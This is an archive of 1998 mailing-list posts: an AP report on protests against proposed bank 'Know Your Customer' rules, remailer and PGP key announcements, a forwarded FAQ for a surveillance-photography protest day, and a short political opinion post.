X-MIME-Autoconverted: from 8bit to quoted-printable by burgoyne.com id IAA15087

=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
SCAN THIS NEWS
12/10/98

----------------------
New anti-money laundering rules spark big protest on bank privacy
5.26 p.m. ET (2226 GMT) December 10, 1998

By Marcy Gordon,=A0Associated Press

WASHINGTON (AP) =97 Federal regulators are being deluged with thousands o=
f
e-mail messages from citizens furious about new anti-money laundering rul=
es
that they view as an invasion of privacy.

As a visible symbol of the federal government with a plaque in every bank
branch, the Federal Deposit Insurance Corp. has become a magnet for
consumers' anger over the proposed rules.

But regulators at other federal banking agencies also reported Thursday t=
hey
had received many protesting e-mails, letters and telephone calls =97 som=
e of
them apparently instigated by anti-government groups.

The ire is directed at the proposed regulations, called "Know Your
Customer'' rules, that would require banks to verify their customers'
identities and know where their money comes from. Banks also would have t=
o
determine customers' normal pattern of transactions and report any
"suspicious'' transactions to law enforcement authorities.

The proposal, published Monday in the Federal Register, is designed to
combat money laundering techniques used by drug traffickers and other
criminals to hide illegal profits. Laundering includes the use of wire
transfers and bank drafts as well as "smurfing,'' the practice of breakin=
g
down transactions into smaller amounts that don't have to be reported und=
er
banking laws.

The torrent of e-mail, first reported in The Wall Street Journal Thursday=
,
came as the 90-day public comment period opened for the proposal.

It reflects growing anxiety among consumers about banks' use of personal
financial data =97 a concern that prompted a top federal regulator to war=
n the
banking industry this spring that it needs to protect customers' privacy.

Someone from Texas wrote, "I am appalled at even the suggestion of such a=
n
intrusion into our personal lives by the federal government.''

In another message, a Florida doctor told the regulators: "Next you'll ...
be implanting (an electronic) chip in newborns at birth so they can be
scanned as they walk in any banks as an adult.''

FDIC spokesman David Barr said the agency had received a staggering 2,700
e-mails and letters opposing the proposal.

At least some of the angry messages appear to have been inspired by
anti-government groups claiming the proposed rules are part of a federal
conspiracy aimed at limiting people's constitutional rights, according to
the Journal and people close to the situation.

Regulators and banking industry officials, who worked together on the new
rules, have taken pains to reassure consumers that their privacy would be
protected under the changes.

"Because of privacy concerns, it is the ... expectation that banks would
obtain only that information that is necessary to comply with the rule, a=
nd
would limit the use of this information to that purpose,'' the Office of =
the
Comptroller of the Currency, which regulates nationally chartered banks,
said in a statement.

John Byrne, senior counsel of the American Bankers Association, said, "Jo=
e
Q. Citizen needs to recognize that there's nothing for him or her to worr=
y
about.''

comments@foxnews.com
=A9 1998, News America Digital Publishing, Inc. d/b/a Fox News Online.

-----Original Message-----
From: W.G.E.N. [mailto:idzrus@earthlink.net]
Sent: Thursday, December 10, 1998 6:30 PM
To: idzrus@earthlink.net
Subject: NID:"KYC" Feds being deluged with Email protest


=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Don't believe anything you read on the Net unless:
1) you can confirm it with another source, and/or
2) it is consistent with what you already know to be true.
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Reply to: <fingerprint@networkusa.org>
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
 To subscribe to the free Scan This News newsletter, send a message to
     <majordomo@efga.org> and type "subscribe scan" in the BODY.
    Or, to be removed type "unsubscribe scan" in the message BODY.
   For additional instructions see www.efga.org/about/maillist.html
-----------------------------------------------------------------------
             "Scan This News" is Sponsored by S.C.A.N.
           Host of the "FIGHT THE FINGERPRINT!" web page:
                www.networkusa.org/fingerprint.shtml
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D



--------------F27EB234AAECCD21A8C78784
Content-Type: text/x-vcard; charset=us-ascii; name="vcard.vcf"
Content-Description: Card for Lynford Theobald
Content-Disposition: attachment; filename="vcard.vcf"
Content-Transfer-Encoding: 7bit

begin:          vcard
fn:             Lynford Theobald
n:              ;Lynford Theobald
email;internet: telnet12@burgoyne.com
x-mozilla-cpt:  ;0
x-mozilla-html: FALSE
version:        2.1
end:            vcard


--------------F27EB234AAECCD21A8C78784--


-> Send "subscribe   snetnews " to majordomo@world.std.com
->  Posted by: Lynford Theobald <telnet12@burgoyne.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Antonomasia <ant@notatla.demon.co.uk>
Date: Mon, 21 Dec 1998 00:40:20 +0800
To: cypherpunks@Algebra.COM
Subject: FINAL REMINDER: new mix keys at notatla
Message-ID: <199812201608.QAA09856@notatla.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1



New mix keys at notatla already in use.
Old ones expire 21Dec1998.


mccain mccain@notatla.demon.co.uk 49894e1cc7629bbb54a3b5f98ba6f6d6 2.0.4b41 MC

- -----Begin Mix Key-----
49894e1cc7629bbb54a3b5f98ba6f6d6
258
AASe8KR46cRA75Jk4YMcE32gpS1uqAveFpRxPVg7
qATY4aPIyVM40QHa/OrHdVc8twmKMNemcdZNCpdb
EDCtaVXLalJ7njbiLs8NMAEVP7WxMQP+1swjvHpR
qP1ikuvy89iNpTbDtl9uf11PNeXiWclrCyFkvS6m
4cXFPskXoa4xWQAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----


teatwo teatwo@notatla.demon.co.uk 4568791f20d5e004225c78e04625bca4 2.0.4b41 MC

- -----Begin Mix Key-----
4568791f20d5e004225c78e04625bca4
258
AATVHyCqv2SGgaEbY0HVnBONNsSQwElFCdvSyxhq
cGL4FZ5A1LGBAGNN+aHnfw0X8hvNsFB7EcmBsZ1v
fUt64xRG5gy2+A3rMlad36iZfqrNBKncGh+Y/uEx
nb+hTyANZNlHsUdAfo+lozx0xoB070e6K3rkgxDG
GytOW9VjDTVR3QAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----


-----BEGIN PGP SIGNATURE-----
Version: PGP 5.0i
Charset: noconv

iQA/AwUBNmrcCTROc55Xv6voEQIs4ACeOat7f/0Kn5gLPazrp6rd+gGgsdEAn0nJ
4jhmxQQTvZWFg7d+BxM7WHHR
=pz5z
-----END PGP SIGNATURE-----

--
##############################################################
# Antonomasia   ant@notatla.demon.co.uk                      #
# See http://www.notatla.demon.co.uk/                        #
##############################################################




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Mon, 21 Dec 1998 06:06:12 +0800
To: cypherpunks@cyberpass.net
Subject: ShootBack this Thursday (answers to questions)
Message-ID: <v04020a02b2a31903c19c@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Resent-Date: Sun, 20 Dec 1998 15:54:24 -0500
Subject: ShootBack this Thursday (answers to questions)
From: mann@eecg.toronto.edu
To: wear-hard@haven.org
Date: 	Sun, 20 Dec 1998 15:48:07 -0500 (EST)
Resent-From: wear-hard@haven.org
Resent-Sender: wear-hard-request@haven.org

several people have been asking questions about national shootback day
this thursday at noon.

for example a lot of people have asked why the day before christmas,
for which there is an answer, e.g. just bring a camera with you when
you go christmas shopping, and try to capture the spirit of the herds
of christmas shopping customers being watched from above...

it was felt that a faq would help immensely, so here is the
national shootback day faq:



   http://wearcam.org/nad-faq.htm

                       NATIONAL ACCOUNTABILITY DAY (NAD)

                       FREQUENTLY ASKED QUESTIONS (FAQ)


   Q. What is NAD?
   A. NAD is short for National Accountability Day. To some it is a
   protest against those who hold us accountable but refuse to or try to
   avoid being accountable to us. To others, it's a fun celebration of
   mutual accountability. To some, it's a chance to get revenge by
   shooting at people who are members of an organization who's been
   shooting at them. To others, it's a chance to help those who have
   helped them, by giving them the gift of protection. It's different
   things to different people, but the one common element is that it
   involves taking pictures of people who are involved in placing us
   under video surveillance.

   Q. How can I give the gift of protection this Christmas season?
   A. On the entrances to their shops, their signs say ``for YOUR
   protection you are being videotaped''. Isn't it heartwarming to see
   that they are offering you so much love and compassion? In return, you
   must offer them the same protection. By photographing them, you will
   show them that you love them and care for them. Put them in your
   family album, and cherish their smiles for centuries.

   Q. Who was the inventor or originator of NAD?
   A. NAD is not the vision of a single individual, but, rather, it is
   the work of an international coalition that includes artists,
   scientists, engineers, and scholars.

   Q. When is NAD?
   A. December 24, 1998

   Q. Why December 24th? Won't the stores be kind of crowded with last
   minute Christmas shoppers then?
   A. That's exactly the point of selecting December 24th. The meaning of
   Christmas has become one of consumerism. Like herds of animals we are
   shepherded into the shops only to be distrusted by the shopkeepers who
   watch over us from on high, with their omniscient surveillance
   network. When the sheep are greatest in number, the shopkeepers will
   have a more difficult time of keeping order. Moreover, it gets boring
   waiting in the long lineups. Why not pass away the time standing in
   line, by doing a little shooting. So take a camera along during your
   Christmas shopping and do a little camera shooting.

   Why was Christmas Eve chosen ? The shops will be rather busy.
   A. that's exactly why. 12:00 noon dec.24th will be the busiest day,
   and the best expression of corporate culture, and the best time to
   shoot. It's a human element.. crowds of people herded like cattle,
   overseen by the surveillance. Also the lineups will be long, so it was
   felt that folks could entertain themselves while waiting in line by
   shooting. When you get bored waiting in line, liven it up with some
   camerafire. Shoot when you're bored. Shoot when you're frustrated.
   Shoot when you're being shot!!!

   Q. Is NAD the same as ShootBack Day?
   A. Yes, NAD is also known to many as National ShootBack Day or
   National ShootingBack Day. (ShootBack is one word! There is no space
   between Shoot and Back.)

   Q. Isn't 12:00 noon going to happen at different times since the
   different parts of the nation are in different time zones?
   Furthermore, National Accountability Day is International. If that
   itself isn't an oxymoron, then at least it adds to the confusion since
   different coutries around the world are in much different time zones.
   A. That's exactly the point of doing it at noon. As high noon sweeps
   past various time zones, the shot heard around the world will be that
   of clicking cameras. This shot will travel around the world, and the
   shot heard around the world will be the shot seen around the world,
   later on when the contest submissions come in. The shot seen around
   the world will be seen in the nationless realm of cyberspace, hence
   the term ``National'' is partly in jest, for it is certainly not
   limited to any nation in particular.

   Q. How do I enter the contest?
   A. Send your pictures to

International Photo Contest,
284 Bloor Street West, Suite 701,
Toronto, Ontario, Canada,
M5S 3B8

   All submissions become property of NAD and will not be returned.
   Winning entries along with a large number of the submissions will be
   posted to the online gallery.

   Q. What format should the pictures be in?
   A. Any developed format (print, film positive, film negative, etc.),
   or any file format that can be read using GNU software under Gnu
   Public License on a computer running the Linux operating system.
   Alternatively, submissions may be placed on an FTP or HTTP server and
   the address or URL may be submitted. Any submissions that require
   commercial software or commercial operating systems to read will be
   discarded without review. Acceptable media include slides, silver
   halide prints, or other standard forms of photographic prints up to
   8.5 by 11 inches, computer printouts, film negatives, plates (glass
   plate negatives up to 8 by 10 inches), film negative strips, film
   positive strips, diffractive prints, 3.5 inch floppy disks, ISO 9660
   CD ROMs, IDE devices, or SCSI devices. Photographic media must have
   been developed (e.g. no undeveloped films or forms that require
   chemical treatment or processing by NAD staff will be accepted). If
   submissions are made by URL, the image format must be universally
   readable from any WWW browser.

   Q. I have heard that NAD is a protest? Is this true? Will there be a
   march?
   A. If you prefer to think of NAD as a protest, it can certainly be
   explained that way. Rather than protesting by carrying signs, or by
   marching, citizens will protest by going on shooting sprees. Armed
   with their own photographic or videographic cameras and recording
   devices, ordinary citizens will dish out some accountability by taking
   pictures of people who are representatives of organizations who are
   taking pictures of them.

   Q. If NAD isn't a protest, than what is it?
   A. Another equally valid interpretation is that NAD is an agreement
   with the status quo rather than a protest against it. In this
   interpretation cameras are good, so let's have more of them. Pictures
   are good, so let's all take pictures. If a department store is such a
   dangerous place that cameras are needed, then so be it. What's good
   for the goose is good for the gangster. Everyone shoots everyone and
   we're all happy. ``Only criminals are afraid of cameras'', so let's
   give representatives of the Surveillance Superhighway a chance to
   define themselves by seeing if they're afraid of cameras. When we ask
   why we are under video surveillance, we are told by the Bigs that
   ``only criminals are afraid of cameras'', or we are asked ``why are
   you so paranoid''. Now is the time to allow the Bigs to define
   themselves.

   Q. How can I participate?
   A. All you need to do is bring a camera --- any camera --- to a place
   where video surveillance is used.

   Q. How will I know who I should shoot?
   A. Taking pictures of the surveillance cameras will cause models to
   appear very quickly for you to photograph. When you point your camera
   at their cameras, the officials watching their television monitors
   will very quickly dispatch the models for you to shoot. This is a
   universal phenomenon that happens in nearly any large organization
   where video surveillance is used. Models often carry two--way radios
   and wear navy blue uniforms with special badges. Most will be eager to
   pose close to your camera, especially the hand models. They will reach
   out and place their hands over your camera lens so you can get a
   closup hand shot.

   Q. What is the rationale behind NAD?
   A. We are all accountable for our actions. The Bigs keep us under
   surveillance, whether we're just walking down the street, shopping, or
   sometimes even when we're changing clothes in their fitting rooms
   (Phil Patton, Jan. '95, WiReD). That's why Thursday, December 24th is
   National Accountability Day. This is the day to arm yourself with a
   camera, or other photographic or videographic instrumentation, and
   enter various department stores, and other establishments that match
   the classic definition of totalitarian (e.g. establishments that wish
   to know everything about everyone yet reveal nothing about
   themselves).

   Q. What are some examples of totalitarian establishments?
   A. Examples of totalitarian establishments are those in which we are
   placed under extensive video surveillance, yet we are prohibited from
   taking pictures ourselves. The goal of National Accountability Day is
   to challenge this one-sided aspect of Totalitarian Surveillance.

   Q. What subject matter, other than pictures of the surveillance
   cameras and representatives of the SS should I shoot?
   A. Participants will also photograph or make videos of any illegal
   activity they happen to encounter in these totalitarian
   establishments. Evidence of illegal activity includes fire exits
   chained shut, and other forms of entrapment, forcible confinement
   doors, and the like, which are potential fire hazards.

   Q. Should I shoot alone, or be part of a firing squad.
   A. Going salvo is better than going solo. It is preferable that groups
   of citizens participate in unison, to prevent, or at least document
   illegal theft or vandalism of photographic equipment by the Bigs.

   Q. Is there a deeper philisophical underpinning to NAD, or is it just
   a bunch of angry people going postal?
   A. The camera is like Hamlet's Mirror, allowing the Bigs to define
   themselves within a Reflectionist context. Reflectionism holds up a
   mirror to society, and constructs this mirror in a symmetrical way, so
   that it is defined on the same terms as that which it calls into
   question.

   Q. Is there any slogan or aphorism I might use to publicize NAD?
   A.
   Shoot Authority First
   Question Authority Later.
   (Shoot first, ask questions later)

   Q. Is NAD a photo conntest?
   A. There is a photo contest associated with NAD. For entry
   instructions, see http://wearcam.org/nad-entry.htm

--
Subcription/unsubscription/info requests: send e-mail with subject of
"subscribe", "unsubscribe", or "info" to wear-hard-request@haven.org
Wear-Hard Mailing List Archive (searchable): http://wearables.ml.org

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frederick Burroughs <riburr@shentel.net>
Date: Mon, 21 Dec 1998 07:45:50 +0800
To: Cypherpunks <cypherpunks@ns.minder.net>
Subject: Biological warfare by proxy
Message-ID: <367D83DB.CEFCFFFE@shentel.net>
MIME-Version: 1.0
Content-Type: text/plain



The destruction of the al-Shifa pharmaceutical factory in Khartoum,
Sudan, has left that country with little reserve of a medicine to fight
malaria. The factory, which was thought to manufacture chemical warfare
agents, was destroyed by US cruise missiles. The factory produced half
of Sudan's medicines, leaving no supplies of chloroquine, the standard
treatment for malaria. By destroying the means to make medicine to treat
malaria, endemic to Sudan, the US has essentially engaged in biological
warfare by proxy.

A request by aid workers for more aid from the British Government to
help supply medicine to Sudan has been rejected. Story at:
http://reports.guardian.co.uk/articles/1998/12/20/p-39360.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lucky Green" <shamrock@netcom.com>
Date: Mon, 21 Dec 1998 11:18:36 +0800
To: <cypherpunks@Algebra.COM>
Subject: New PGP key for Lucky Green
Message-ID: <000301be2c8d$06c77b60$3501a8c0@lucky.zks.net>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="Boundary..3999.1071713822.multipart/mixed"

--Boundary..3999.1071713822.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

-----BEGIN PGP SIGNED MESSAGE-----

Folks,
I am about to revoke my old DSS key ID 0xB663B0FD for administrative
reasons. My new DSS key is attached. The new DSS key is signed with
both my old DSS key and my ancient RSA key.

If you signed my keys in the past, please sign the new one. Please
discontinue use of my old DSS key.

Thanks,
- --Lucky Green <shamrock@netcom.com>

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.0.2

iQCVAwUBNn24CwSQkem38rwFAQE81AP/SA/AVTvMyWettjxaVOMvSdkSOzZITGPv
bkZDp0posq014TrttVOUakHfLkYMe20bqMqkFLGwmzyfC6T33QYEnWXVZ7br/LCX
YLg1+5ymS6ceCTgH8nfV+JIOGraxG7k818mF4NinR2xksfG8+p+yxoasSDVMwh0K
wrt6/YCsYdQ=
=ufA7
-----END PGP SIGNATURE-----


--Boundary..3999.1071713822.multipart/mixed
Content-Type: application/octet-stream; name="bin00000.bin"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bin00000.bin"
Content-Description: "Lucky Green.asc"

LS0tLS1CRUdJTiBQR1AgUFVCTElDIEtFWSBCTE9DSy0tLS0tClZlcnNpb246
IFBHUCA2LjAuMgoKbVFHaUJET2ZuN2tSQkFEZnp5ZXJ3WTR6NmZtQ2VoZzZr
ZHp4RXhGckNuOWdNT2RoNkZKNmZ3T3k3TEV5ZS9pcwpNSHZlTllOcm9OQmlq
RDk4Q1J1UmlEbEQ0MEpmd2MvRjR1TVQ4bXIvNVZmMjZLMFVmRGJKb2ZnTDJm
RjRqNU0yClVQZkprekR0dWlKNmlUUkNGOG5kNHcxOHVXdyt6c0lWTUVTNGFr
dUZmNWx3bTRXbm5RTzh0MUQ1OVFDZy8rb0kKQUkwcUpxUnRJTVFQcjAzTzR6
bzY5MHNEL2lzRnQrc3Qva2FIZjBUYUFBRFBZeWRZbUlSN2taTGh3NWh6ZWFh
bApXK2lHR2w3NTM4OEtIWlZzOVdhNHBvQzd4ZjR2QWVOUDZnRWt3UnEvd0RH
NHYzWThBdXY2L2pvM1A4VlJ4dFRkClFLWnNZVmp6Wkt2Uys5UnlFcnUweHVy
Q0d5dHN6aTFxTTc0QlNKRTltUnNDcmU4bEFXWloyYTQ2Y0NhRkxmby8KUU82
U0EvOXF3UUt1ZnFJc1I5SFBWYmVJUyswU2ZMTjF0Q09Qd1g0QytGMjJkU251
d1I4Z3hMczRRSFFZT1JGZgpQVmpNQVQ1Z0xmYjlCbkJRbjM3V0EvRkY3VlBO
Q3lQTWdMVkFIL3FpVDk4NzZLY3BlazRoU3hUN2FjK2NXdVFMCkllVTJZa2E2
MmZyNEJYWGVsMzdOemFKVlZZS25WTXlacWtVL0pDOStYeEFxS0dob3k3UWhU
SFZqYTNrZ1IzSmwKWlc0Z1BITm9ZVzF5YjJOclFHNWxkR052YlM1amIyMCtp
UUNWQXdVUU01K2YxQVNRa2VtMzhyd0ZBUUdZakFRQQpoTGRLT1ZnUzM4RmVB
WnBINk1hZWJCbU1nMWdnZE9Xb0txR0ZYNVRaQTV3R1lFUkE5K1BpcXcxRWsy
MGRRVGVpCkcyUlRjR3hYYlB3RnVvYzVDQjU3WjQ0cFIrdTllbXJDZEk0eEh5
djllNTFrTjlyMmxkS0VHYWt3YnVBTVhuNFYKaDVWV21IdjRVVjhuZkV5OXBX
dVdEbE9GKzNoZTQwNzNoUkllWXZIZy9IU0pBSlVEQlJBem9yb3pMOS9MNitT
bwp6RTBCQVpmVUJBQ3MzNVNQbGkvZzhFbk9DS3Q0TnYzTWFHZ3VyckdTN1FS
YUJ3a2NvMlpIdzBPVzJXVTZqM1lmCjJldE1Yd2cveEUxUFJqOE1GT0pDQkQ2
elc4RjNiYU1CSHAvMUJOTGdBMHF3a2YrOUhYSi9WZFE1amdxc1p4a08KOHUw
eXVuMDdIRDZoK0x2LzlzZkNSZStPRFVMYVAvUHdzUTJGazMxcXhZaXdrdnpH
RHgxK1FZa0FsUU1GRURQNwpCQ0Z3eUZndUR1STZMUUVCYk84RC8xNmw5Y3px
cEoxOEp3dUxZZFQ1ODkyUFBDNjY5NEF5aFhnRVBzOFRkTnZFCkR1eEF5VS91
bFMwREhELzlHbzJpZS8yRzdXMHpWeWdsakc1eXpyQVNrQ0t1bjFkNHFxeTlP
Yjh6dDFnbDRBK1oKb3lLT1o2NjA2dURkenZDWlREQW0xbitmSWFkUDBSRVN5
YzBMMUNibUhvd2FmVnZDbm9pWFFKV3EzYXVMWXJQLwppUUJMQkJBUkFnQUxC
UUl6bjUrNUJBc0RBUUlBQ2drUWlYR2ZwN1pqc1AwUnlnQ2dneEVmZnh0aHNE
Q0RDeUdXCmlMcUZwMnh2SEFZQW9MdnNiQkt2Mzg2aDNZemo3ZDROaDBEN25Z
WmVpUUEvQXdVUU05M2NkTnVZQWg0ZFVTby8KRVFMaFlBQ2ZRcHlnOEtHY1Zy
a05yNjlvL0xCbmFVenpleUVBblJmSWl5bERDK3lENitFMStQOVhtb095RTFu
VwppUUEvQXdVUU0vc0RnZVNOcnlvdGxHSHhFUUlPU2dDZUlYNmpQVmp2UHJ2
VUZmeWVtNlRsbnZ6MWhlRUFvT0NmCkJCSmxaNktXQkJZeUFYdGpVb3IzNHZO
dGlRQS9Bd1VRTTZLNlR1bzY1ZmJWcHpjVEVRSThSQUNmZjUzVno0OWQKZ0Fp
Z1ZuV3FZMGJITDcxNFFtb0FuQTMyd1liTWVOOHdLUlVpR0NMakZlTnJaSEFZ
aVFCUUJCQVJBZ0FRQlFJMgpFTlNNQlFNR0g0ZUFBd1VCZUFBS0NSRHpQcmgx
dklyRVdBRWRBS0REbldabFVoU1ZYOGNMOUk5bXhoRUFGWW8zCjlRQ2c5SmxV
ZjF1dkVGaUxrV2p5amkzS3FXaWNGaFNKQVNZRUVBRUJBQkFGQWpZUTFLSUZB
d1lmaDRBREJRRjQKQUFvSkVLUFBJZDJsZkFmaHFQVUgvakQ4L3F1bVJ0cndh
RmZYakRsaVQ3U3h2M3NWbUs2bG9MemwwN0UrYU9sawo3MWVOeVF6QlAzQURt
UnBLazQvTm9BMlJYUGs1QXh4U0VZeFZEWUVoTVpKOVF5TU9rZ3Rtd052OXpm
MFFVNUQzClQ4SUJmeXNRVEYvck9XaUY1SGQ3alA1cWd0dk50bjE3V1c1VVE4
ODhSNlhVT2lpdER5UldBaDJvOWVBbExkc0MKbE1idjNQN3BBMnJMVStPemZG
ZzcvbzJwUUxvNE53aVBDSDFyd0hDcmhNNHFydUd3cFlLcWZXbStndEZFVGlk
awpSb0pyVGh1Tzg2a3BrZC9zVDNPaXNVc1c5enZNbE9RTmtJVkpSREMwa0lz
Z05OaXkzRXU1N29FenpBV1djSDl2ClR3WXkxRHZ1TXJhalA4YW9JSGh2cFJ6
NUQ1NDN3UVpFeE0zZnFqZXZMaEtKQUZBRUVCRUNBQkFGQWpZUTFOY0YKQXdK
Ynp3QURCUUY0QUFvSkVKQk4vcU1vd0NtdkNBb0Ftd2ZsNkMzOGlUSW5mMlBG
L3h2bFhBd0hKZnRYQUtDYwp6aTEzSURGbmtiNzRYMUJ2TXhLcHB2RmVjWWtB
UHdNRkVEUDYxQko1dzd3MVljQWwveEVDVGFJQW4wclZwUnpLCnR5d3ltTVVl
Qk53RUd5bWZScUNlQUtDQU1YNWtROTZ0ZGZYSW83ZlhGaE9wMkRMaTY0a0FQ
d01GRURQTCtyWTgKQXJrMUpuc3NCaEVDVC9rQW4xTzRTK2l0MjJQaC8xNDlq
ekt4d3dSY0lJZVdBS0NsNlhMRklGVE55N2lGWUtCTApDQnc2LzZMV3dva0FQ
d01GRURSS2FONFdKYjl1SExoUWVCRUNkaVVBb051TndQQjkxczRoZ3FrdFlp
VDk2NWM4ClVLU1ZBSjlIUzFRN2Q1cFJYMDZDL0lTL3p5STErSFNXcElrQVB3
TUZFRFJISWJ0VUpCTVNvMWw5eHhFQ0plZ0EKb0w0WEhxVllneDNET2JaTXJx
cXJwMWI4NjhaaEFKOTh0NGYvVHArYkFZcURZdW9RUlZWcVdOY1N0b2tBUHdN
RgpFRFFTb1lGNmZnaXBwMTViMXhFQ3ZWWUFuMmE4bDc4M0NaWW83ZXc2M0VO
SGFVTkhPcWRNQUtDdDZYNGNLTFowCjZ4RUFsbXVGRno3c3MvZC9TWWtCRlFN
RkVEUkI1NGY5KzZURmxDUlpZUUVCcFp3SC9SL2RuT0ZjR3VaZmNheGEKTFNr
U29KMWdRRHVBQTlIUTgvV04wenZOWDRYSGZPQUxQSUxFMFByMGlrVjhPZUdX
Ylhud09id3BmcHBOVU91cQpvajh4bHZwQTFtYXJrelhITkljelpZaGU1S2RH
czIzMlJ4czNXd01wTEY0V0NYQ3lrdXZOSzk5UmhTWU00UWxMCkRPZHZvMmNP
N1d5L1p2RnNRaS9DTm5XM0lvZG9FWjUrVS9UUmU0cDRPWmlDZk41RWM5Tk5q
VkYxZnNVcmlpOC8KcFhzZ2xDK1VYcWxhMWRQS3RNZHh0MjNtM2RBY1oweE9x
SnI5MUdZZUdPLzBrb3BUN1ZrdG8vTEpqbUZYOE9RUQo5aTFvUnRMQW5Dandz
dGRQWFAyRUp6U0tLNjVTUXhSbjBLaEkyQlZaNmNhT2pNTCtjbWkwUFJVUHdE
YnNxdkdKCmZpZG9MMk9KQUVZRUVCRUNBQVlGQWpYUWhJSUFDZ2tRUjU1VlMy
VEFDcFBYQUFDZzBHc29Kc0RIbm1SZGJoUVIKU21nb0JZSVNNRnNBbjBkTElK
QXRvTk9GczVrR2F0ekFLUzRKMzgyL2lRQkdCQkFSQWdBR0JRSTF4K2RqQUFv
SgpFR1U1aVFTTTZMYVQrZGNBb01OOUUwdjh3b3JZNDdrdWY1QnVueUJxNjB2
dUFKOXF4UGlpTFkyZGs5VmVIcmNnCkQ2b2UyMFJ5RG9rQVJnUVFFUUlBQmdV
Q05jZm5sd0FLQ1JDTG9tdUF4VGxsVjIxY0FLQ2dxMDVzQ3h4OEdKVXkKL2xo
Z2JSUUdiaDRxWWdDZlgzOWNLaHkyWmx3bGZKYlNtTGRzbit6bEpLYUpBRVlF
RUJFQ0FBWUZBalhINTgwQQpDZ2tRbzhMUkVyWTg2RkhwSHdDZzBYakR5L2ZB
bkJxaW5sQzUrc2hpTmRyelZqd0FuMFJTako1VXdPOTRpYzhaCkpiM2FFZXJV
QUxwNmlRQkdCQkFSQWdBR0JRSTF4K2YyQUFvSkVLell3Qm1DOG13VGk0c0Fu
anM1K0tHZ0dTNUkKY08xQXBCZDlXMkNyNmRQckFKOWVLTmo1WGM4SGhoWVdQ
WTBEeW1aRnBQNldxb2tBUmdRUUVRSUFCZ1VDTmR0Ugpyd0FLQ1JCaFcyZ2ZM
RlRJK25rK0FLREl2WmJibk1uMUFteVhMZm9rRjhvY0prK1B4UUNmVlVnS3BE
RUNXMnd6CjBMeTRHaG9nTit5YkVNR0pBRVlFRUJFQ0FBWUZBallHaWNVQUNn
a1FPSXpicm5wVmNDdVo5Z0NneS9lRFRCc3QKU3NVaWhSM2xMcllMNHBxS0pM
UUFuM2MrQnZjc1lXeEs2T2VLRDdhaWYyQkFnOURQaVFCR0JCQVJBZ0FHQlFJ
MgpQdHllQUFvSkVEbWFJTWIxeVltWlhBVUFvUDdSbFJXRkRRL01mbXRvU2wv
TW9peGE1OTFzQUtEMmt4aGNNK1RkCk1GVGo3OW44MWRSUDRoUWN0clFsVEhW
amEza2dSM0psWlc0Z1BITm9ZVzF5YjJOclFHTjVjR2hsY25CMWJtdHoKTG5S
dlBva0FTd1FRRVFJQUN3VUNOQ2NvNFFRTEF3RUNBQW9KRUlseG42ZTJZN0Q5
